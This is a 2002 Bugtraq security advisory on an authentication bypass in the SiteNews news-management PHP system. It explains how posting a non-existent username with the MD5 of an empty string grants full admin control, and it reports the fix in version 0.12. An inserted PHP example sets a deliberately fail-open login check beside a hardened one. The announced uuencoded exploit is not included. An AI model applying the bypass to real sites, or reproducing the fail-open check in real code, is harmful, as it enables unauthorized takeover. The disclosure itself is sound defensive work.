Date: Sat, 16 Feb 2002 18:46:35 +0100 (CET)
From: Ulf Härnhammar <ulfh@update.uu.se>
To: bugtraq@securityfocus.com
Subject: SiteNews remote add user exploit

SiteNews remote add user exploit

PROGRAM: SiteNews
AUTHOR: JP Durman (jp@pgw.nl)
HOMEPAGE: http://www.linuxnetwork.nl/
VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well)
TYPE: remote add user exploit
SEVERITY: high

DESCRIPTION:

SiteNews is an open-sourced system for displaying and managing news items on
websites. According to its homepage, it has been downloaded almost 4000 times.

ISSUE:

The function GetPassword in function.php returns an empty string when it is
asked for a non-existent username. Combined with the fact that the program
sends usernames in cleartext and passwords as MD5 sums, this means that you can
log in without an account by posting a non-existent username and the MD5 sum of
an empty string as the password. SiteNews has no concept of user levels, so
once you are in, you have full control over all news items and all users.
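
The fail-open check described above beside a fail-closed version, as an added PHP example that is not SiteNews code and not part of the original advisory. Only the name GetPassword and its empty-string behaviour come from the advisory; the account data, the other function names and the exact form of the comparison are assumptions.

```php
<?php
// Constructed account data; the advisory does not show SiteNews's storage format.
$users = ['editor' => 'correct horse'];

// Fail-open lookup as the advisory describes it: unknown user -> "".
function GetPassword(array $users, string $username): string {
    return $users[$username] ?? '';
}

// Assumed shape of the flawed check: hash whatever the lookup returned and
// compare it with the MD5 sum the client posted.
function login_vulnerable(array $users, string $username, string $md5sum): bool {
    return md5(GetPassword($users, $username)) === $md5sum;
}

// Hardened lookup (hypothetical helper): "no such account" is null, a result
// that can never be hashed and matched.
function find_password(array $users, string $username): ?string {
    return array_key_exists($username, $users) ? $users[$username] : null;
}

// Hardened check: reject unknown users and empty stored passwords before any
// comparison, then compare in constant time.
function login_hardened(array $users, string $username, string $md5sum): bool {
    $stored = find_password($users, $username);
    if ($stored === null || $stored === '') {
        return false;
    }
    return hash_equals(md5($stored), $md5sum);
}

$cases = [
    ['no-such-user', md5('')],              // account does not exist
    ['editor',       md5('correct horse')], // legitimate login
    ['editor',       md5('')],              // real account, wrong sum
];
foreach ($cases as [$user, $sum]) {
    printf("%-13s vulnerable=%-5s hardened=%s\n", $user,
        var_export(login_vulnerable($users, $user, $sum), true),
        var_export(login_hardened($users, $user, $sum), true));
}
```

The advisory does not show how version 0.12 fixed the issue; the hardened function above is one way to close it.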

The author was contacted with an explanation, an exploit and a patch on the
5th of February. Version 0.12, which is not vulnerable, was released on the
7th of February.

RECOMMENDATION:

I recommend that all users upgrade to version 0.12 immediately.

EXPLOIT:

Here is my HTML exploit for this issue. It is uuencoded. You type in a non-
existent username and the user and password combination that you wish to add
to the system, and the exploit creates the new user for you, despite the fact
that you are not authorized.

// Ulf Harnhammar
metaur@prontomail.com


